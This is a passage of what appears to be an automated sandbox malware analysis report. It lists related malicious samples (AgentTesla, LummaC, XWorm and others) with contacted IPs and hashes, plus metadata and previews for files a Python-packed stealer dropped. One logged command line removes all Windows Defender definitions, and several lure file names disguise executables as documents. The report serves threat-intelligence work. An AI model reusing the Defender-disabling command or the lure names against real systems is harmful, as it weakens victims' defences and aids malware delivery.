  SecuriteInfo.com.Trojan.MulDrop28.33962.19660.9173.exe | malicious | XWorm
    • 208.95.112.1
  New Order.exe | malicious | AgentTesla
    • 208.95.112.1
  fEv4R2ahiLCQa5O.exe | malicious | AgentTesla
    • 208.95.112.1
  PW68YarHboeikgM.exe | malicious | AgentTesla
    • 208.95.112.1
  General Agreement.docx.exe | malicious | Python Stealer, Babadeda, Exela Stealer, Waltuhium Grabber
    • 208.95.112.1
  eETnl6XIwn | malicious | Unknown
    • 208.95.112.1
Match: CLOUDFLARENETUS
  SecuriteInfo.com.Win64.MalwareX-gen.31244.2279.exe | malicious | Unknown
    • 104.26.1.5
  SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exe | malicious | Unknown
    • 104.26.1.5
  SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe | malicious | Xmrig
    • 104.20.4.235
  SecuriteInfo.com.Win64.CrypterX-gen.31361.18171.exe | malicious | Unknown
    • 104.26.0.5
  SecuriteInfo.com.Trojan.TR.Redcap.cdtxw.10783.3124.exe | malicious | LummaC
    • 188.114.97.3
  f6ffg1sZS2.exe | malicious | Babuk, Djvu
    • 188.114.96.3
  wo4POc0NG1.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
    • 172.67.170.64
  K3SRs78CAv.exe | malicious | LummaC
    • 188.114.97.3
  file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
    • 104.21.95.91
  file.exe | malicious | Stealc, Vidar
    • 172.64.41.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 3b5074b1b5d032e5620f69f9f700ff0e
  SecuriteInfo.com.Win64.Trojan.Agent.2S9FJA.25494.32016.exe | malicious | Unknown
    • 172.67.203.125
    • 128.116.123.4
    • 104.20.23.46
  SecuriteInfo.com.Win64.Trojan.Agent.2S9FJA.25494.32016.exe | malicious | Unknown
    • 172.67.203.125
    • 128.116.123.4
    • 104.20.23.46
  sheisverynicegirlwithgreatworkingskillwithgereatniceworkign.hta | malicious | Cobalt Strike, Remcos
    • 172.67.203.125
    • 128.116.123.4
    • 104.20.23.46
  seemeherewithgreatthingsentiretimewithgreatthingsonhere.hta | malicious | Cobalt Strike
    • 172.67.203.125
    • 128.116.123.4
    • 104.20.23.46
  seethebestthingswhichgivennewthingswithmewesee.hta | malicious | Cobalt Strike
    • 172.67.203.125
    • 128.116.123.4
    • 104.20.23.46
  TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe | malicious | Snake Keylogger, VIP Keylogger
    • 172.67.203.125
    • 128.116.123.4
    • 104.20.23.46
  Factura-2410-CFDI.bat | malicious | Unknown
    • 172.67.203.125
    • 128.116.123.4
    • 104.20.23.46
  SUNNY HONG VSL PARTICULARS.xlsx.exe | malicious | AgentTesla, PureLog Stealer
    • 172.67.203.125
    • 128.116.123.4
    • 104.20.23.46
  JOSXXL1.exe | malicious | GuLoader, Snake Keylogger
    • 172.67.203.125
    • 128.116.123.4
    • 104.20.23.46
  WINNING DILIGENCE - VESSEL PARTICULARS.doc.exe | malicious | AgentTesla, PureLog Stealer
    • 172.67.203.125
    • 128.116.123.4
    • 104.20.23.46
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: C:\Users\user\AppData\Local\Temp\_MEI76122\_bz2.pyd
  5K9iuU0ALY.exe | malicious | Blank Grabber, XWorm
Match: C:\Users\user\AppData\Local\Temp\_MEI76122\VCRUNTIME140.dll
  5K9iuU0ALY.exe | malicious | Blank Grabber, XWorm
  grA6aqodO5.exe | malicious | Python Stealer, CStealer
  cPl7CoJTBx.exe | malicious | Luna Grabber, Luna Logger
  R6IuO0fzec.exe | malicious | Python Stealer, CStealer
  SecuriteInfo.com.Win64.Malware-gen.11853.10965.exe | malicious | Unknown
  SecuriteInfo.com.Gen.Variant.Lazy.564550.16803.23255.exe | malicious | Unknown
  H2f8SkAvdV.exe | malicious | Blank Grabber, XWorm
Process: C:\Windows\System32\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.2565504248793764
Encrypted: false
SSDEEP: 192:XzdP678r0bU9+dQ+bGaWxejol2/fsLzuiFDZ24lO8Kgz:pP+DbG+dQlaml23sLzuiFDY4lO81
MD5: D8E645E0BA4CBBC5E5CB1385FC04D704
SHA1: BA7696702BE9B52AAB213C76CF70FBD84503DB2B
SHA-256: A65A038EFA9FFD303D64509F9C98ADABF71ECF224D8674B6543269831E6F660A
SHA-512: 61CD83ABC8EC2566B5438B62B7745756E4E086661E1FE5982081ABFDF11492DB4F8795F03ECC0919AA7121AFB74F9D72F2C9B591931B822540B1DC7E0881C5D5
Malicious: false
                                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.5.2.4.6.7.8.2.1.5.8.8.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.5.2.4.6.7.9.0.4.3.9.8.3.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.4.4.4.f.f.f.1.-.7.5.8.5.-.4.c.3.4.-.b.b.b.b.-.0.4.0.4.a.4.d.2.5.c.0.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.3.7.c.7.6.2.6.-.f.0.a.5.-.4.d.e.d.-.b.4.c.f.-.d.1.8.9.7.b.7.3.3.3.5.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.b.o.u.n.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.o.l.a.r.a.B.o.o.t.s.t.r.a.p.p.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.2.8.-.0.0.0.1.-.0.0.1.4.-.4.9.9.3.-.b.0.d.d.9.7.2.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.f.e.1.7.3.6.3.1.c.a.d.c.4.a.7.6.9.5.d.3.9.9.5.7.a.1.2.d.e.9.c.0.0.0.0.0.0.0.0.!.0.0.0.0.2.1.f.2.3.2.c.2.f.d.8.1.3.2.f.8.6.7.7.e.5.3.2.5.8.5.6.2.a.d.9.8.b.4.5.5.e.6.7.9.!.b.o.u.n.d...

Process: C:\Windows\System32\WerFault.exe
File Type: Mini DuMP crash report, 16 streams, Sun Oct 27 17:44:38 2024, 0x1205a4 type
Category: dropped
Size (bytes): 623002
Entropy (8bit): 3.257653588430877
Encrypted: false
SSDEEP: 6144:zeGcjs2V3Qa6b334KDW8VuiBv8gD2NXriqrJDW:ze7Qa6b334T8VXBv1D25riq
MD5: EED56D11F4A1B2B795CFBBF9540D0A5A
SHA1: 54067A8D37D0519D10DC7277BE2B5AACFC313B28
SHA-256: 348103821A178550C5EA842A36C368BDACF747260C632BB2F793056C20213DBE
SHA-512: EB7A36089D5BB266C0DAEAECAA8EBD9FFC6B3E5FEDB929E017A016474332551DFC6D32436DA314391ED7CA96F016CCE7FAC0C5B8C8B9760CD6823B4BC45E51E1
Malicious: false
                                                                                                                                                                                                                            Preview:MDMP..a..... ........|.g............d...........<...........<....)...........)......tT..............l.......8...........T............W...*...........F...........G..............................................................................eJ.......H......Lw......................T.......(....{.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):6770
Entropy (8bit):3.721030363750419
Encrypted:false
SSDEEP:192:R6l7wVeJccZrt3qYZW8qprK89b3zVf0l9m:R6lXJnZrt3qYUP3hfr
MD5:91679ED9E509F98973AC0ACC3C0F88AF
SHA1:BB4D36E3956735A1185C00797D1D9387A694A33E
SHA-256:8CF682A57D82D0BAB2B4ED33BD322060F77E3CEEB346F9C91252D6934BAB62E1
SHA-512:BA9F8DCD439E9DBD884EAB325D52810BAED31BF0239F889D876549EBB76CBC4CE827DB68EC4405DB472D1A1F161C5F3C3F83B9AC416F589A71C131C6EDA78739
Malicious:false
Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.7.6.<./.P.i.

Process:C:\Windows\System32\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4774
Entropy (8bit):4.4499618263179075
Encrypted:false
SSDEEP:48:cvIwWl8zszJg771I94LWpW8VYtYm8M4J/T/Fkyq8v1T415LeBd:uIjfNI7z67VVJWWy15L6d
MD5:17F377B1CE34503A2B948E8904192ACB
SHA1:28AA443E500E87DE91EBAFBCC8C3B166221A76B8
SHA-256:1C0B627FA1700A90D013BC0C5445FB6FF084201585235D42901E213E847DD345
SHA-512:F332A6AB9A21DD830C1BB75ADC415AF74C7805B35DAB9C40C72CE97EF1CF1BB3687B31D01FE32EF8F5AF09D90A24B7883571E0540A7016ECDA3A22D84D036380
Malicious:false
Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="562127" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):1.1940658735648508
Encrypted:false
SSDEEP:3:Nlllulbnolz:NllUc
MD5:F23953D4A58E404FCB67ADD0C45EB27A
SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
Malicious:false
Preview:@...e................................................@..........

Process:C:\Users\user\AppData\Local\Temp\bound.exe
File Type:JSON data
Category:dropped
Size (bytes):103
Entropy (8bit):4.081427527984575
Encrypted:false
SSDEEP:3:XSWHlkHFWKBgdvHvIhN9GIxFf9oQg652UTF/HLMl1m:XSWHlW0aivQLkWFfx/52uyPm
MD5:B016DAFCA051F817C6BA098C096CB450
SHA1:4CC74827C4B2ED534613C7764E6121CEB041B459
SHA-256:B03C8C2D2429E9DBC7920113DEDF6FC09095AB39421EE0CC8819AD412E5D67B9
SHA-512:D69663E1E81EC33654B87F2DFADDD5383681C8EBF029A559B201D65EB12FA2989FA66C25FA98D58066EAB7B897F0EEF6B7A68FA1A9558482A17DFED7B6076ACA
Malicious:false
Preview:{. "args" : {. "code" : "8PgspRYAQu". },. "cmd" : "INVITE_BROWSER",. "nonce" : ".". }

Process:C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:modified
Size (bytes):894
Entropy (8bit):3.1235837540248492
Encrypted:false
SSDEEP:12:Q58KRBubdpkoPAGdjrZN6Ak9+MlWlLehW51IC4N6p:QOaqdmOFdjrz6j+kWResLIL6p
MD5:6477E6189F8624379D00ABE46DD01C6C
SHA1:BA5353383C87FF524A141A8F97702E64FAC39141
SHA-256:A54CC47BDC0BF41CD3BEE282589935CF903A91023C144AD117A3F35FEC5C7157
SHA-512:FD03326C68807D69EFB6FC692F911599025F2F67E7462DC36567F3123A19BE8D2E93FC2CBA94C4081247F1019FA4EED1FE0902618F11BE38AB2D61563CF9BC14
Malicious:false
Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. S.u.n. .. O.c.t. .. 2.7. .. 2.0.2.4. .1.3.:.4.4.:.3.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.u.n. .. O.c.t. .. 2.7. .. 2.0.2.4. .1.3.:.4.4.:.3.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):120400
Entropy (8bit):6.6017475353076716
Encrypted:false
SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
MD5:862F820C3251E4CA6FC0AC00E4092239
SHA1:EF96D84B253041B090C243594F90938E9A487A9A
SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: 5K9iuU0ALY.exe, Detection: malicious
• Filename: grA6aqodO5.exe, Detection: malicious
• Filename: cPl7CoJTBx.exe, Detection: malicious
• Filename: R6IuO0fzec.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win64.Malware-gen.11853.10965.exe, Detection: malicious
• Filename: SecuriteInfo.com.Gen.Variant.Lazy.564550.16803.23255.exe, Detection: malicious
• Filename: H2f8SkAvdV.exe, Detection: malicious
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):49424
Entropy (8bit):7.815740675307968
Encrypted:false
SSDEEP:768:esvzuaVl+ztlrpqKgHrzwTzjT+KyH9qtztKnb3/+u2xmFepwUIJLV1/DU5YiSyvX:huaugLzUz+lOsnb33lUIJLV1i7SyFB
MD5:58FC4C56F7F400DE210E98CCB8FDC4B2
SHA1:12CB7EC39F3AF0947000295F4B50CBD6E7436554
SHA-256:DFC195EBB59DC5E365EFD3853D72897B8838497E15C0977B6EDB1EB347F13150
SHA-512:AD0C6A9A5CA719D244117984A06CCE8E59ED122855E4595DF242DF18509752429389C3A44A8BA0ABC817D61E37F64638CCBDFFC17238D4C38D2364F0A10E6BC7
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: 5K9iuU0ALY.exe, Detection: malicious
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).............d....................................................`.............................................H.................... .. ...................................................p..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):64272
                                                                                                                                                                                                                            Entropy (8bit):7.834005148796091
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:Opx/sXWpBktLQ+ndnJZLIDdwXtRg1zk1+3XTkIJyPeB7SyFmhz:OXsXWpBgLBndJSdIgpk1+3XwIJyPeBrm
                                                                                                                                                                                                                            MD5:79879C679A12FAC03F472463BB8CEFF7
                                                                                                                                                                                                                            SHA1:B530763123BD2C537313E5E41477B0ADC0DF3099
                                                                                                                                                                                                                            SHA-256:8D1A21192112E13913CB77708C105034C5F251D64517017975AF8E0C4999EBA3
                                                                                                                                                                                                                            SHA-512:CA19DDAEFC9AB7C868DD82008A79EA457ACD71722FEC21C2371D51DCFDB99738E79EFF9B1913A306DBEDACB0540CA84A2EC31DC2267C7B559B6A98B390C5F3A7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............J.......................................p............`.........................................Hl.......i.......`.......................l.......................................V..@...........................................UPX0....................................UPX1................................@....rsrc........`......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):120080
                                                                                                                                                                                                                            Entropy (8bit):7.901857200989369
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:DXHhVKXEI3D7AboLmJ2g+3FAZ9raGHT2PIJvqMkPp5:DX3gEcD/Ksg+3JGHC0kb
                                                                                                                                                                                                                            MD5:21D27C95493C701DFF0206FF5F03941D
                                                                                                                                                                                                                            SHA1:F1F124D4B0E3092D28BA4EA4FE8CF601D5BD8600
                                                                                                                                                                                                                            SHA-256:38EC7A3C2F368FFEB94524D7C66250C0D2DAFE58121E93E54B17C114058EA877
                                                                                                                                                                                                                            SHA-512:A5FBDA904024CD097A86D6926E0D593B0F7E69E32DF347A49677818C2F4CD7DC83E2BAB7C2507428328248BD2F54B00F7B2A077C8A0AAD2224071F8221CB9457
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....0...... .....................................................`.....................................................................t+..........\....................................... ...@...........................................UPX0....................................UPX1.............~..................@....rsrc....0.......$..................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):36112
                                                                                                                                                                                                                            Entropy (8bit):7.6548425105220375
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:yzzaDWoin9vvSwNbHyxBpnrIJvIoS5YiSyvE62Em:yzOW6wNbHCrIJvIoQ7Syc6c
                                                                                                                                                                                                                            MD5:D6F123C4453230743ADCC06211236BC0
                                                                                                                                                                                                                            SHA1:9F9ADE18AC3E12BCC09757A3C4B5EE74CF5E794E
                                                                                                                                                                                                                            SHA-256:7A904FA6618157C34E24AAAC33FDF84035215D82C08EEC6983C165A49D785DC9
                                                                                                                                                                                                                            SHA-512:F5575D18A51207B4E9DF5BB95277D4D03E3BB950C0E7B6C3DD2288645E26E1DE8EDCF634311C21A6BDC8C3378A71B531F840B8262DB708726D36D15CB6D02441
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P..........@........................................@............`.........................................|;..P....9.......0.......................;......................................@+..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):88336
                                                                                                                                                                                                                            Entropy (8bit):7.9108932581373015
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:wlkdTJ3vEbPVfwGX+zD2z4qVHCy4N491I4lSi5j68Xi4az2yhIJ01uv7SyXN:wUFvEbdfwGOnqpCb491IK/EIJ01uvj
                                                                                                                                                                                                                            MD5:055EB9D91C42BB228A72BF5B7B77C0C8
                                                                                                                                                                                                                            SHA1:5659B4A819455CF024755A493DB0952E1979A9CF
                                                                                                                                                                                                                            SHA-256:DE342275A648207BEF9B9662C9829AF222B160975AD8925CC5612CD0F182414E
                                                                                                                                                                                                                            SHA-512:C5CBA050F4B805A299F5D04EC0DCE9B718A16BC335CAC17F23E96519DA0B9EAAF25AE0E9B29EF3DC56603BFE8317CDC1A67EE6464D84A562CF04BEA52C31CFAC
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...). .......p........................................................`.........................................4...L....................0..........................................................@...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):27408
                                                                                                                                                                                                                            Entropy (8bit):7.449801379195215
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:he8SQ/XAVUI1ZCXG5oZa7gJX28IJ9U4NVTHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:he8XPAVhZwvpm8IJ9U4X5YiSyvTo2Et
                                                                                                                                                                                                                            MD5:513DCE65C09B3ABC516687F99A6971D8
                                                                                                                                                                                                                            SHA1:8F744C6F79A23AA380D9E6289CB4504B0E69FE3B
                                                                                                                                                                                                                            SHA-256:D4BE41574C3E17792A25793E6F5BF171BAEEB4255C08CB6A5CD7705A91E896FC
                                                                                                                                                                                                                            SHA-512:621F9670541CAC5684892EC92378C46FF5E1A3D065D2E081D27277F1E83D6C60510C46CAB333C6ED0FF81A25A1BDC0046C7001D14B3F885E25019F9CDD550ED0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).0..........@.....................................................`.............................................L.......P............`..l...........<.......................................@...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):45328
                                                                                                                                                                                                                            Entropy (8bit):7.729647917060796
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:BVO07RbhED2LEIuo4OCYkbaEts+ZIQivK+F8kp9jHIJywFmk5YiSyv+2Eb:zPkD2LEIuo4E5C30d1jHIJywFmu7Sy21
                                                                                                                                                                                                                            MD5:14392D71DFE6D6BDC3EBCDBDE3C4049C
                                                                                                                                                                                                                            SHA1:622479981E1BBC7DD13C1A852AE6B2B2AEBEA4D7
                                                                                                                                                                                                                            SHA-256:A1E39E2386634069070903E2D9C2B51A42CB0D59C20B7BE50EF95C89C268DEB2
                                                                                                                                                                                                                            SHA-512:0F6359F0ADC99EFAD5A9833F2148B066B2C4BAF564BA16090E04E2B4E3A380D6AFF4C9E7AEAA2BA247F020F7BD97635FCDFE4E3B11A31C9C6EA64A4142333424
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ll}.ll}.ll}...}.ll}..m|.ll}..o|.ll}..h|.ll}..i|.ll}..m|.ll}.lm}.ll}..m|.ll}..a|.ll}..l|.ll}..}.ll}..n|.ll}Rich.ll}........PE..d.....g.........." ...).p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
